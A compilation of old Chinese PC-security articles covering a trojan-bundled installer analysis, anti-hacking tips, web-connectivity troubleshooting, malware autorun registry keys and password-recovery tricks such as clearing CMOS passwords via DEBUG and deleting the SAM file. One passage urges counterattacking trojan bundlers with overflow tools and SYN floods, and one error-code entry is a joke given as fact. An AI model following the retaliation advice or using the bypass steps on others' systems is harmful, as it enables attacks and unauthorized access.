　　接下来，我们来学习学习他的免杀的方法。鸽子的主文件叫awareness.cn，这个名字具有相当大的隐蔽性，容易被当成一个合法的网站空间。使用了两次的NsPacK V3.7 -> LiuXingPing *加壳，并且用了自己编写的花指令，成功的实现了大范围内的免杀。我们再来看看原始的带马的安装包，是一个捆绑机，使用了VMProtect加密入口处代码，并且将VMProtect自动产生的vmp0,vmp1两个区段修改成了rsrc1,vmp1一避人耳目。然后，再次使用花指令，这个花指令是VC++6。0的入口处代码。

　　在带马的安装包启动时，自动释放出鸽子并且改名成3.tmp在临时目录运行，再释放出真正的安装包为2.tmp在临时目录运行，只要我们复制出2.tmp并且改名为2.exe就能够得当纯净版本的游戏其中2.exe就是纯净版本的游戏，awareness.exe就是马，我们的工作顺利完成了。

　　总结一下，利用icesword我们能够轻易的发现问题，让这里的捆绑马的人显出原形。

　　如果你有什么文件值得怀疑，那么可以在icesword的监控中运行，然后就能够轻易的发现是不是存在问题，这种方法比filemon/regmon联合监控的效果还要好，强烈推荐!

　　对付这些恶意的捆马者，我们要能轻松的识破他们的诡计，如果你想反向攻击攻击恶意的捆马者，可以使用些扫描工具或者溢出工具攻击攻击。如果实在没有办法可以使用SYN攻击工具直接攻击他的鸽子上线端口，这样绝对能让鸽子上线失效，当然，你要去免费域名商去把他的免费域名报告要求封闭也可以，具体的就大家自己干吧。

　　最后希望大家逃离挂马捆马的苦海，同时也希望那些以挂马捆马为荣耀的人停手吧，这样做对你们的技术提高有什么好处?

安全杂谈之个人电脑防黑的安全准则

　　在这个网络时代，每个人都可以轻易地从网络上得到各种简单易用的黑客工具，于是，众多“黑客”就诞生了。这些人多半是一些无所事事的网虫，天生就有破坏的欲望。于是无聊+表现欲促使他们拿着从网上找来的各种“炸弹”之类的东西开始在浩大的网络中寻找可以炫耀一下自己本事的猎物。当你在网络上冲浪，或是正在同别人聊天时，机器突然死机了或是蓝屏了，网页不能浏览了，QQ登录不上去了，这时你就该想想自己是不是中毒了，或是被黑了。那么为防止我们的个人电脑被黑客攻击，我们使用电脑时该遵循些什么样的安全准则呢?

　　密码安全准则

　　不要使用简单的密码。不要简单地用生日、单词或电话号码作为密码，密码的长度至少要8个字符以上，包含数字、大、小写字母和键盘上的其他字符混合。对于不同的网站和程序，要使用不同口令，以防止被黑客破译。要记录好你的ID和密码以免忘记，但不要将记录存放在上网的电脑里。不要为了下次登录方便而保存密码;还有，要经常更改密码和不要向任何人透露您的密码。

　　电子邮件安全准则

　　不要轻易打开电子邮件中的附件，更不要轻易运行邮件附件中的程序，除非你知道信息的来源。要时刻保持警惕性，不要轻易相信熟人发来的E-mail就一定没有黑客程序，如Happy99就会自动加在E-mail附件当中。不要在网络上随意公布或者留下您的电子邮件地址，去转信站申请一个转信信箱，因为只有它是不怕炸的。在E-mail客户端软件中限制邮件大小和过滤垃圾邮件;使用远程登录的方式来预览邮件;最好申请数字签名;对于邮件附件要先用防病毒软件和专业清除木马的工具进行扫描后方可使用。

　　IE的安全准则

　　对于使用公共机器上网的网民，一定要注意IE的安全性。因为IE的自动完成功能在给用户填写表单和输入Web地址带来一定便利的同时，也给用户带来了潜在的泄密危险，最好禁用IE的自动完成功能。IE的历史记录中保存了用户已经访问过的所有页面的链接，在离开之前一定要清除历史记录;另外IE的临时文件夹(\Windows\Temporary Internet Files)内保存了用户已经浏览过的网页，通过IE的脱机浏览特性或者是其他第三方的离线浏览软件，其他用户能够轻松地翻阅你浏览的内容，所以离开之前也需删除该路径下的文件。还要使用具有对Cookie程序控制权的安全程序，因为Cookie程序会把信息传送回网站，当然安装个人防火墙也可对Cookie的使用进行禁止、提示或启用。

　　聊天软件的安全准则

　　在使用聊天软件的时候，最好设置为隐藏用户，以免别有用心者使用一些专用软件查看到你的IP地址，然后采用一些针对IP 地址的黑客工具对你进行攻击。在聊天室的时候，还要预防Java炸弹，攻击者通常发送一些带恶意代码的HTML语句使你的电脑打开无数个窗口或显示巨型图片，最终导致死机。你只需禁止Java脚本的运行和显示图像功能就可以避免遭到攻击了，但这时你就没法访问一些交互式网页了，这需要你个人权衡。

　　防止特洛伊木马安全准则

　　不要太容易信任别人，不要轻易安装和运行从那些不知名的网站(特别是不可靠的FTP站点)下载的软件和来历不明的软件。有些程序可能是木马程序，如果你一旦安装了这些程序，它们就会在你不知情的情况下更改你的系统或者连接到远程的服务器。这样，黑客就可以很容易进入你的电脑。笔者并不是让大家不信任来自Internet的任何东西，因为即使是很大的网站，都有可能遭到黑客的破坏。对于此类软件，即使通过了一般反病毒软件的检查也不要轻易运行，要用如Cleaner等专门的黑客程序清除软件检查，并且需要提醒大家注意的是这些软件的病毒库文件要经常更新。同时不要让他人随意在您的计算机上安装软件。另外如果是购买二手电脑，不要购买或者使用那些曾经受过入侵，但仍未清理过硬盘的二手电脑。因为这样很可能为黑客提供了入侵你的电脑的机会，最好是重新格式化硬盘，并重装操作系统。

　　定期升级你的系统

　　很多常用的程序和操作系统的内核都会发现漏洞，某些漏洞会让入侵者很容易进入到你的系统，这些漏洞会以很快的速度在黑客中传开。如近期流传极广的尼姆达病毒就是针对微软信件浏览器的弱点和Windows NT/2000、IIS的漏洞而编写出的一种传播能力很强的病毒。因此，用户一定要小心防范。软件的开发商会把补丁公布，以便用户补救这些漏洞。建议用户订阅关于这些漏洞的邮件列表，以便及时知道这些漏洞后打上补丁，以防黑客攻击。当然最好使用最新版本的浏览器软件、电子邮件软件以及其他程序，但不要是测试版本。

　　安装防火墙

　　不要在没有防火墙的情况下上网冲浪。如果你使用的是宽带连接，例如ADSL或者光纤，那么你就会在任何时候都连上Internet，这样，你就很有可能成为那些闹着玩的黑客的目标。最好在不需要的时候断开连接，如可以在你的电脑上装上防黑客的防火墙——一种反入侵的程序作为你的电脑的门卫，以监视数据流动或是断开网络连接。如Lockdown2000 、ZoneAlarm、天网或者其他的一些个人防火墙软件。另外如瑞星、江民、金山公司的最新版杀毒软件都附有防火墙，可以起到杀毒、防黑的双重功效，值得信赖。

　　禁止文件共享

　　局域网里的用户喜欢将自己的电脑设置为文件共享，以方便相互之间资源共享，但是如果你设了共享的话，就为那些黑客留了后门，这样他们就有机可乘进入你的电脑偷看你的文件，甚至搞些小破坏。建议在非设共享不可的情况下，最好为共享文件夹设置一个密码，否则公众以及你的对手将可以自由地访问你的那些共享文件。

　　如果你在上网时遵守了以上这些准则的话，就可以在一定程度上保证个人电脑的安全，避免黑客的攻击。

答疑解惑 QQ能上但网页无法打开是怎么回事

答疑解惑 QQ能上但网页无法打开是怎么回事

电脑迷

作者：冰河洗剑

　　许多上网的朋友都碰到过这样的问题，QQ能正常登陆聊天，但是网页就是打不开，头疼死了。是网络故障，还是IE浏览器有问题，或者是中了病毒？……今天就为大家解决无法浏览网页的问题，对症下药，重现网页吧！

莫名出现的“代理”

　　代理服务器是好东西，许多不能上的网或者速度慢的网，经过代理一下，就能上了，而且速度快上很多。但是有时凭空出现的代理反而会让网页无法打开。笔者就碰到过好几例因为代理设置不当造成无法上网的故障。

　　打开IE浏览器，点击菜单“工具/Internet选项”，打开选项设置对话框。选择“连接”选项卡，点击“局域网设置”按钮，打开局域网设置。如果勾选了“为LAN使用代理服务器”项，并设置了代理服务器的话，将该项取消（如图1）。点击确定，重开IE，就可以正常浏览网页了。

图1 取消代理服务器设置

　　小提示：在使用其它浏览器，如Maxthon时，也可能会出现代理问题而无法浏览网页的情况。可点击菜单“选项/代理服务器”，勾选其中的“不使用代理”。

DNS服务解析大剖析

　　安装宽带后自己进行过网络设置的朋友，应该都知道DNS服务器的重要性，DNS担负着将网站地址变换为IP地址重任，如果DNS解析过程中出现了故障，那么网站将无法访问。在笔者碰到过的无法浏览网页的事例中，也有这样的情况。

　　首先，可在“运行”中输入“cmd”，回车后打开命令提示符窗口。随便PING一下某个网站，如“nslookup www.baidu.com”，如果返回的信息是“Default Server:UnKnown”，那么可以肯定是DNS服务器设置出了问题。可在当前命令行下执行命令：“server 202.98.192.168”

　　即可重设DNS服务器，这里的“202.98.192.168”是本地的DNS服务器，可改为自己所在地的DNS服务器(具体值可打询问当地网络服务商)。如果更改DNS服务器后，还是无法浏览网页，那么就不是本地设置的问题，而是网络服务商的问题了。

赶走病毒和流氓软件

　　如果系统中进驻了病毒或者流氓软件，也可能会导致IE浏览器无法打开网页。例如前一段时间，笔者帮朋友解决了好几例类似的问题，都是由于一款叫“roogoo.com”广告流氓软件引起的网络故障。往往都是用杀毒软件删除了一个名为“roogoo.com”的流氓软件后就无法上网，经笔者检测发现，该病毒会破坏XP系统中的“Winsock.dll”和“wsock32.dll”文件，该文件是用于Winsock协议的。只有对网络协议进行恢复，才能上网。

　　运行Winsock协议修复工具“Winsock Fix”，运行后点击“Fix”按钮（如图2），即可完成修复，重启系统后网络就可正常浏览网页了。如果还是不行的话，可能是另外一些网络系统文件给破坏了，可在命令行下输入命令：“SFC /SCANNOW”按提示插入系统安装光盘完成修复即可。



图2 修复系统文件

IE出错，殃及网页

　　有一些恶意网站会非法修改用户的系统设置，破坏IE浏览器，造成网页无法正常浏览。当碰到不能正常打开网页时，排除了DNS服务器、代理设置不当，以及网络协议的问题，可以尝试更换其它非IE核心的浏览器，例如Maxthon、Firefox之类的，如果能正常上网，那么肯定是IE出了问题。

　　在windows XP中，默认状态是无法重装IE的，可按如下方法进行修复：首先准备好Windows XP安装光盘，插入光驱，在“开始/运行”窗口输入“rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 %windir%\Inf\ie.inf”命令，回车后即可重装IE。

　　也可以打开“注册表编辑器”，展开[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed

Components\{89820200-ECBD-11cf-8B85-00AA005B4383}]，将IsInstalled 的DWORD 值改为0 就可以从“添加删除程序”中重装IE了。

防火墙阻挡

　　有时候IE无法浏览网页，也有可能是防火墙阻止了IE进程连接网络。例如笔者就亲自碰到过这样的问题，在笔者的电脑上安装了Outpost防火墙，该防火墙功能非常强大，会自动阻止一些特殊的木马通过IE连接网络。如果无法浏览网页，可以尝试关闭防火墙监控，如果能正常打开网页，那么需要对防火墙进行设置，放IE通行网络：

　　一般可打开网络防火墙的连接设置框，在网络黑名单或拦截程序中找到IE，将其删除，或者移动到可信任程序列表中（如图3）。IE就可以正常浏览网页了。



图3 防火墙设置


能上QQ不能上网的终极解决办法

前言：本文介绍了六种引起不能上网的原因，并一一提供了解决方法。希望对碰到不能上网、能上QQ不能上网等问题的读者有所帮助。

正文

　　前几日，家中电脑网络出现问题，具体表现为网页无法打开，但QQ却能正常登录。后经高手指点后终于摆平。上网查阅有关资料，发现造成这一问题的原因是多种多样的，于是整理出来与各位分享。以后碰到不能上网的问题也可轻松解决。

一、感染了病毒所致

　　这种情况往往表现在打开IE时，在IE界面的左下框提示：正在打开网页，但总是没反应。在任务管理器里查看进程，看看CPU的占用率如何，如果是100%，可以肯定是感染了病毒。这时你想运行其他程序，简直就是受罪，速度出奇的慢。这就要查看是哪个进程占用了系统资源。找到后，将其名称记下来，然后点击结束。如果不能结束，则要重新启动机器，进入安全模式下，将相关文件删除。还要进入注册表，在注册表对话框里点“编辑→查找”，输入那个程序名，找到后将其删除，最好反复搜索几遍，这样才能确保彻底删除（有很多病毒在杀毒软件无能为力时，最好的方法就是手动删除）。

二、与设置代理服务器有关

　　有些朋友为了提高网速，在浏览器里设置了代理。设置代理服务器是不影响QQ联网的，因为QQ用的是4000端口，而访问互联网使用的是80或8080端口，这就是笔者上述的网页无法打开，但QQ却能登录的原因。而代理服务器一般不是很稳定，有时候能上，有时候不能上。如果有这样设置的，把代理服务器取消就OK了（图1）。



图1 正确设置代理服务器

三、DNS服务器解释出错

　　所谓DNS，即域名服务器（Domain Name Server)，它把域名转换为计算机能够识别的IP地址。如PCD网站（www.pcdigest.com）对应的IP是218.201.41.22。如果DNS服务器出错，则无法进行域名解释，自然也就不能上网了。

　　这种情况通常是网络服务器接入商即ISP的问题，可打电话咨询ISP。

　　有时候则是路由器的问题，无法与ISP的DNS服务连接，这时可把路由器关闭一会再开或是重新设置路由器即可。

　　还有可能是网卡无法自动搜寻到DNS的服务器地址，可以尝试用指定的DNS服务器地址。进入“控制面板→网络和拨号连接”，双击“本地连接→属性→TCP/IP协议”，在弹出的对话框中选择“使用下面的DNS服务器地址”，然后填写相应的DNS服务器IP地址。不同的ISP有不同的DNS地址（图2），如本地电信常用的是202.96.134.133（主用），202.96.128.68（备用）。（PConline注：不同的省市DNS服务器地址会不同，请直接与当地ISP联系获取。）



图2　填写DNS服务器地址

四、系统文件丢失

　　导致IE不能正常启动。这种现象颇为常见，原因也多种多样。

　　1.系统的不稳定，表现为死机频繁，经常莫名重启，非正常关机造成系统文件丢失。

　　2.软硬件的冲突，常表现为安装了某些软件引起网卡驱动的冲突或与IE的冲突。自从Intel推出超线程CPU后，有一个突出的问题就是WinXP SP1下的IE6与超线程产生冲突。

　　3.病毒的肆虐导致系统文件的损坏、丢失。

　　4.能打开某一网站的首页，但不能打开其2级链接。

　　如果是第一种情况，可尝试修复系统，放入原安装光盘在“开始→运行”里输入sfc /scannow，按回车运行即可。

　　如果是第二种情况，可以把最近安装的软硬件卸载，Win2000/WinXP的系统可以在Windows启动菜单里选择“最后一次正确的设置”，另外，WinXP系统在开启系统还原的情况下还可以利用系统还原解决系统文件丢失的问题。

　　如果是WinXP的系统因为超线程CPU的原因，可以在BIOS里禁用超线程或者升级到SP2。这种情况下，QQ自带的TT浏览器以及其他一些第三方浏览器一般都能正常使用，可用它们替代。

如果是因为病毒的问题，则要对系统进行全面的杀毒。如果是第四种情况，只需重新注册如下的DLL文件即可：shadocvw.dll、shell32.dll、Oleaut32.dll、Actxprexy.dll、Mshtml.dll、Urlmon.dll、Msjava.dll、Browseui.dll。具体的注册方法为：在“开始→运行”对话框里输入“regsvr32 ”（每输入完一个文件，都要回车，图3）。上述第二个文件可以先不注册，等注册完以上所有的文件后，重启Windows，再试着浏览网页。如果问题依然没有解决，再把以上文件挨个重新注册一遍即可。



图3 注册dll文件

五、IE损坏

　　IE损坏时，网页也是无法正常打开的，经系统修复也无法弥补，那么重装IE就是最好的办法了。如果是Win2000＋IE6.0/WinXP的系统，重装IE有点麻烦，有如下两种方法可以试试。

　　1.打开注册表，展开HKEY_ LOCAL_MACHINE\SOFTWARE\Microsoft

\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}，将IsInstalled的DWORD值改为0，然后再重新安装IE6即可。

　　2.放入WinXP安装光盘，在“开始→运行”里输入“rundll32.exe setupapi，InstallHinfSection DefaultInstall 132%windir%infie.inf”，然后按下回车键即可。

六、防火墙封端口所致

　　如果以上方法都试过，还是不行的话，那就看看防火墙的设置，是不是防火墙把有些端口屏蔽了。笔者的电脑就是设置了代理之后，防火墙屏蔽了端口，导致取消代理还是不能解决问题。遇到这种情况，只需进入防火墙设置界面，将关闭的端口开启即可。由于各个防火墙的设置不同，笔者就不在这里一一赘述了。

七、网页出错的常见代码解析

　　其实IE在浏览出现问题的时候已经提供了不少错误信息提示，可以根据这些信息提示更快地找出错误的原因。只是这些提示都是一些英文以及数字代码，令不少电脑用户很茫然，下面便将一些常见的提示简单介绍一下。

　　401 UNAUTHORIZED：表示你必须有一个正确的用户名及密码才能得到该网页（unauthorized site)的使用权，例如浏览一些收费网页时就会出现该信息。

　　403 FORBIDDEN：表示该网页或URL受到保护，禁止访问。

　　404 NOT FOUND：最常见的错误信息，表示你所访问的网页不存在或是URL地址错误。

　　409 Fire flood and Pestilence：这个代码没有任何意义，你只需重新连接即可。

　　500 SERVER ERROR：表示服务器错误，通常是对方网页程序设计错误而产生的，你只能等待对方纠正网页错误，别无良策。

　　503 SERVICE UNAVAILABLE：表示不能连上对方网站，因为网络线路非常繁忙。过一会再试即可。

　　BAD FILE REQUEST：你可能在网页上填写某些表格的时候填入了不正确的资料，以致在处理资料的时候出错，你只需返回上一层仔细检查错误的资料并修改即可。

　　SITE UNAVAILABLE：有四个可能性产生这个提示信息：访问用户过多；网站因维修而关闭；电话线的噪音太大；该网站已不复存在。如果用户过多，你只需稍后再试，电话线问题的话，换根电话线就能解决，其他两种没有办法。

　　UNABLE TO CREATE HOST：表示你所键入的网址或其他URL不能找到所在的目标位置，也许是你输入了错误的地址或是网页不存在，也有可能是你的拨号连接出了问题。

　　Connection Refused By Host：表示连接被拒绝，解决办法是稍后再试。

　　Failed DNS Lookup：表示域名解析出错。这种错误通常是因为网站负荷过重，通常发生在商业性网站。

　　Document Contains No Data：表示网页存在，但无数据。解决办法：稍后再试。

　　Connection Refused：表示线路忙。 解决办法：稍后再试。

　　A Network Error Occured：表示主机繁忙或URL地址出错。 解决办法是检查URL地址或稍后再试。

　　纵观这些错误代码，大部分都是由URL地址错误引起的，所以一般情况下碰到类似情况时先检查一下URL地址是否正确。

抢先了解最易被黑客利用的注册表位置

抢先了解最易被黑客利用的注册表位置

　　现在人们总会遇到这样地情况，某天打开自己mail中的一个附件，因为那个mail的地址和自己一个同事的地址很像，因此没有多考虑就将附件下载打开了。不想这个附件是个病毒，它让自己的机器变的很慢，杀毒之后也没有太大作用。

　　其实，病毒、木马、和一些恶意软件，往往都会对Widnows的注册表下毒手，虽然破坏形式不尽相同，但是经过分析它们的破坏手法并非无规律可循。这里列出了一些用户系统中被易被修改的系统设置和注册表项。建议再换用其他木马专杀工具试一下，并再针对以下注册表键值进行检查，看看是否有被改动过的迹象。

　　系统设置文件

　　对于Widnows 9X系统，常见的是病毒修改可能会更改autoexec.bat，只要在其中加入执行病毒程序文件的语句即可在系统启动时自动激活病毒。*更改drive:\windows\win.ini或者system.ini文件。病毒通常会在win.ini的“run=”后面加入病毒自身的文件名，或者在system.ini文件中将“shell=”更改。

　　注册表键值

　　目前，只要新出的蠕虫/特洛伊类病毒一般都有修改系统注册表的动作。它们修改的位置一般有以下几个地方：

　　在系统启动时自动执行的程序

　　HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\

　　在系统启动时自动执行的系统服务程序

　　HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\

　　在系统启动时自动执行的程序，这是病毒最有可能修改/添加的地方

　　HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ HKEY_CLASSES_ROOT\exefile\shell\open\command

　　说明：此键值能使病毒在用户运行任何EXE程序时被运行，以此类推，..\txtfile\.. 或者 ..\comfile\.. 也可被更改，以便实现病毒自动运行的功能。

　　另外，有些健值还可能被利用来实现比较特别的功能：

　　有些病毒会通过修改下面的键值来阻止用户查看和修改注册表：

　　HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools =

　　为了阻止用户利用.REG文件修改注册表键值，以下键值也会被修改来显示一个内存访问错误窗口。

　　例如：Win32.Swen.B 病毒 会将缺省健值修改为：

　　HKCR\regfile\shell\open\command\(Default) = "cxsgrhcl.exe showerror"

　　通过对以上地方的修改，病毒程序主要达到的目的是在系统启动或者程序运行过程中能够自动被执行，已达到自动激活的目的。

以绝招应对损招　封杀木马病毒全攻略

　　木马是一种基于远程控制的病毒程序，该程序具有很强的隐蔽性和危害性，它可以在人不知鬼不觉的状态下控制你或者监视你。有人说，既然木马这么厉害，那我离它远一点不就可以了!然而这个木马实在是“淘气”，它可不管你是否欢迎，只要它高兴，它就会想法设法地闯到你“家”中来的!哎呀，那还了得，赶快看看自己的电脑中有没有木马，说不定正在“家”中兴风作浪呢!那我怎么知道木马在哪里呢，相信不熟悉木马的菜鸟们肯定想知道这样的问题。下面就是木马潜伏的诡招，看了以后不要忘记采取绝招来对付这些损招哟!

　　1、集成到程序中

　　其实木马也是一个服务器-客户端程序，它为了不让用户能轻易地把它删除，就常常集成到程序里，一旦用户激活木马程序，那么木马文件和某一应用程序捆绑在一起，然后上传到服务端覆盖原文件，这样即使木马被删除了，只要运行捆绑了木马的应用程序，木马又会被安装上去了。绑定到某一应用程序中，如绑定到系统文件，那么每一次Windows启动均会启动木马。

　　2、隐藏在配置文件中

　　木马实在是太狡猾，知道菜鸟们平时使用的是图形化界面的操作系统，对于那些已经不太重要的配置文件大多数是不闻不问了，这正好给木马提供了一个藏身之处。而且利用配置文件的特殊作用，木马很容易就能在大家的计算机中运行、发作，从而偷窥或者监视大家。不过，现在这种方式不是很隐蔽，容易被发现，所以在Autoexec.bat和Config.sys中加载木马程序的并不多见，但也不能因此而掉以轻心哦。

　　3、潜伏在Win.ini中

　　木马要想达到控制或者监视计算机的目的，必须要运行，然而没有人会傻到自己在自己的计算机中运行这个该死的木马。当然，木马也早有心理准备，知道人类是高智商的动物，不会帮助它工作的，因此它必须找一个既安全又能在系统启动时自动运行的地方，于是潜伏在Win.ini中是木马感觉比较惬意的地方。大家不妨打开Win.ini来看看，在它的[windows]字段中有启动命令“load=”和“run=”，在一般情况下“=”后面是空白的，如果有后跟程序，比方说是这个样子：run=c:\windows\file.exe load=c:\windows\file.exe 这时你就要小心了，这个file.exe很可能是木马哦。

　　4、伪装在普通文件中

　　这个方法出现的比较晚，不过现在很流行，对于不熟练的windows操作者，很容易上当。具体方法是把可执行文件伪装成图片或文本----在程序中把图标改成Windows的默认图片图标,再把文件名改为*.jpg.exe,由于Win98默认设置是"不显示已知的文件后缀名",文件将会显示为*.jpg,不注意的人一点这个图标就中木马了(如果你在程序中嵌一张图片就更完美了)。

　　5、内置到注册表中

　　上面的方法让木马着实舒服了一阵，既没有人能找到它，又能自动运行，真是快哉!然而好景不长，人类很快就把它的马脚揪了出来，并对它进行了严厉的惩罚!但是它还心有不甘，总结了失败教训后，认为上面的藏身之处很容易找，现在必须躲在不容易被人发现的地方，于是它想到了注册表!的确注册表由于比较复杂，木马常常喜欢藏在这里快活，赶快检查一下，有什么程序在其下，睁大眼睛仔细看了，别放过木马哦：HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion下所有以“run”开头的键值;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion下所有以“run”开头的键值;HKEY-USERS\.Default\Software\Microsoft\Windows\CurrentVersion下所有以“run”开头的键值。

6、在System.ini中藏身

　　木马真是无处不在呀!什么地方有空子，它就往哪里钻!这不，Windows安装目录下的System.ini也是木马喜欢隐蔽的地方。还是小心点，打开这个文件看看，它与正常文件有什么不同，在该文件的[boot]字段中，是不是有这样的内容，那就是shell=Explorer.exe file.exe，如果确实有这样的内容，那你就不幸了，因为这里的file.exe就是木马服务端程序!另外，在System.ini中的[386Enh]字段，要注意检查在此段内的“driver=路径\程序名”，这里也有可能被木马所利用。再有，在System.ini中的[mic]、[drivers]、[drivers32]这三个字段，这些段也是起到加载驱动程序的作用，但也是增添木马程序的好场所，现在你该知道也要注意这里喽。

　　7、隐形于启动组中

　　有时木马并不在乎自己的行踪，它更注意的是能否自动加载到系统中，因为一旦木马加载到系统中，任你用什么方法你都无法将它赶跑(哎，这木马脸皮也真是太厚)，因此按照这个逻辑，启动组也是木马可以藏身的好地方，因为这里的确是自动加载运行的好场所。动组对应的文件夹为：C:\windows\start menu\programs\startup，在注册表中的位置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders Startup="C:\windows\start menu\programs\startup"。要注意经常检查启动组哦!

　　8、隐蔽在Winstart.bat中

　　按照上面的逻辑理论，凡是利于木马能自动加载的地方，木马都喜欢呆。这不，Winstart.bat也是一个能自动被Windows加载运行的文件，它多数情况下为应用程序及Windows自动生成，在执行了Win.com并加载了多数驱动程序之后开始执行(这一点可通过启动时按F8键再选择逐步跟踪启动过程的启动方式可得知)。由于Autoexec.bat的功能可以由Winstart.bat代替完成，因此木马完全可以像在Autoexec.bat中那样被加载运行，危险由此而来。

　　9、捆绑在启动文件中

　　即应用程序的启动配置文件，控制端利用这些文件能启动程序的特点，将制作好的带有木马启动命令的同名文件上传到服务端覆盖这同名文件，这样就可以达到启动木马的目的了。

　　10、设置在超级连接中

　　木马的主人在网页上放置恶意代码，引诱用户点击，用户点击的结果不言而喻：开门揖盗!奉劝不要随便点击网页上的链接，除非你了解它，信任它，为它死了也愿意等等。

强迫下线：QQ密码无端被修改了？

强迫下线：QQ密码无端被修改了？

出处：PConline

作者：King

　　本周一中午，有几位常用QQ或TM的用户均反映被QQ服务器踢了，而不多时，笔者的TM也被踢了出来，具体的信息看下图：



好可怕的信息

　　笔者修改密码是很有规律的，不会随便就将自己的密码忘记或修订。现在突然出现这样的情形，首先是怀疑被黑了。不过经查证，自己的QQ号、密码均无变化，电脑程序也正常运行。那可能就是服务器监测到了什么改动，令TM需要重新启动了，而且在重新进入的时候，还被服务器告知需要输入一些验证码以确保不是机器自动登陆。

　　由于还不断有人反映出现这个问题，我们将密切关注事态发展，各位有遇到这个问题的请回评论跟进。

计算机中的十二种常用密码破解法

出处： IT专家网 责任编辑：卢林嘉

　　在日常操作中，我们经常要输入各种各样的密码，例 如开机时要输入密码，QQ时也要先输入密码，假如你忘记了这 些密码，就有可能用不了机器、打不开文件、不能聊天...。

　　也许还会造成很大的损失!下面我们就介绍电脑操作中常用密码 的破解方法，希望能解你燃眉之急!

　　一、遗忘了SYSTEM密码

　　如果你遗忘了CMOS设置中的SYSTEM密码，就无法启动机器了， 解决的办法只能是:打开机箱，把电池取下、正负极短接，给 CMOS放电，清除CMOS中的所有内容(当然也就包括密码)，然后 重新开机进行设置。

　　注意:有些主板设置了CMOS密码清除跳线，请参 照主板说明书将该跳线短接，这样也可以清除CMOS密码。

　　二、遗忘了SETUP密码

　　遗忘了该密码，就不能进行CMOS设置了。如果你能使用计算机 ，但不能进入CMOS设置，可以这样解决:在DOS状态下启动DEBUG ，然后输入如下命令手工清除SETUP密码:

　　_ o 70 16

　　_ o 71 16

　　_ q

　　你也可以 用CMOS密码破解软件来 显示CMOS密码，这样的软件有很多，例如Cmospwd,它支持Acer、AMI、AWARD、COMPAQ、DELL、IBM、 PACKARD BELL、PHOENIX、ZENITH AMI等多种BIOS)，在DOS下启动该程序，CMOS密码就会显示出来 。

　　三、遗忘了Windows登录密码

　　WinMe/98下对策:开机后按F8键选择DOS启动，然后删除Windows 安装目录下的*.PWL密码文件、以及Profiles子目录下的所有个 人信息文件，重新启动Windows后，系统会弹出一个不包含任何 用户名的密码设置框，此时无需输入任何内容，直接单击“确 定”，登录密码即被删除。

　　另外，将注册表数据库HKEY_LOCAL_MACHINE、Network、Logon 分支下的UserProfiles修改为“0”，然后重新启动Windows也 可达到同样目的。

　　WinXP/2000下对策:删除系统安装目录\system32 \config下的SAM文件，重新启动，此时管理员Administrator账 号已经没有密码了，用Administrator帐户登陆系统，不用输入 任何密码，进入系统后再重新设置登陆帐户密码即可。

　　四、遗忘了Windows屏保密码

　　解决方法:在开机后按F8键，选择安全模式启动，进入Windows 后，右击桌面空白处，从弹出的快捷菜单中选择“属性”/屏幕 保护，取消“密码保护”即可。

　　五、遗忘了Windows电源管理密码

　　Windows的电源管理功能也可以设置密码，启用此功能后，当系 统从节能状态返回时就会要求输入密码。

　　如果你遗忘了该密码，可以使用前面破解Windows登录密码的那 种方法去破解。

六、遗忘了微软Office密码

　　解决方法:使用破解Office系列文档密码的软件，这样的软件有 很多，例如AOPR(下载网址http://www.elcomsoft.com/)，该软 件可以同时对微软Office系列Word、Excel及Access等软件所生 成的密码进行破解，还可以对Word的*.DOT模板文件的密码进行 搜索。

　　七、遗忘了WinZip压缩包密码

　　解决方法:用软件UZPC(Ultra Zip Password Cracker，找回丢失的密码。使用该软件时要先设置适当的解密 方式，例如“后门方式”、“穷举方式”、“字典方式”和“ 模式匹配方式”等，一般采用“Brute Force穷举方式”，然后软件就会对所有可能的密码进行测试， 直至找出最后的结果。

　　八、遗忘了RAR压缩包密码

　　遗忘了RAR压缩包密码后，你可下载一个CRARK软件来对其进行破解，它主要通过命令 行来实现对RAR压缩包的密码进行破解。使用时一般只需直接使 用“CRARK RAR压缩包文件名”命令，利用缺省参数即可进行破解。

　　九、遗忘了QQ/ICQ密码

　　为保护QQ密码，你应该赶快到这里 申请密码保护。假如你忘记了QQ密码、或者密码被盗时 ，只需填写正确的信息即可取回。

　　如果你要找回 ICQ密码，可以使用软件ICQ Password Revealer，这是一个DOS下的命令 行实用软件，你只需在ICQ安装文件夹的NEWDB子文件夹下执行 该文件，然后按照屏幕提示输入自己的UIN，系统即会找回“久 违”的ICQ密码。

　　十、遗忘了OE密码

　　如果你忘 了密码，无法进入OutLook Express阅读收到的邮件、使用通讯簿等，可以这样破解:重启 计算机并按F8，选择“安全模式”，再启动OE就不需要密码了 ，然后你可以重建一个用户(不能修改密码)，把信息导入新用 户信箱即可。

　　十一、遗忘了Foxmail帐户密码

　　解决方法:消除忘记的Foxmail帐户密码。首先打开Foxmail，新 建一个帐户(帐户名任意，例如如lacl1)，然后退出Foxmail;运 行Windows资源管理器，找到Foxmail\MAIL\lacl1文件夹，里边 有个“account.stg”，把它复制到忘记密码的帐户(例如 “lacl”)目录中，直接覆盖原来的“account.stg”文件;再重 新运行Foxmail，打开忘记密码的帐户，呵呵，怎么连“口令提 示框”也没有?现在你就可以直接打开忘记密码的帐户，而且帐 户中原来的邮件一封都不会少!

　　十二、查看“*”密码

　　许多密码在屏幕上都是以“*”显示的，因此我们无法直接看到 密码的原始字符，如果你使用专门破解“*”密码的软件，即可 查出这些密码的原始字符。

　　这样的软件有很多，例如Win2000/Win98下你可用iOpus Password Recovery，WinXP下可用Password Spectator Pro 。使用时，只需先打开显示“*”的窗口，启动这类软件，然后 按住Ctrl键、在密码栏中按下鼠标左键，这些“*”密码的原始 字符就会显示出来了。

黑客告诉你：木马生成器不能随便碰

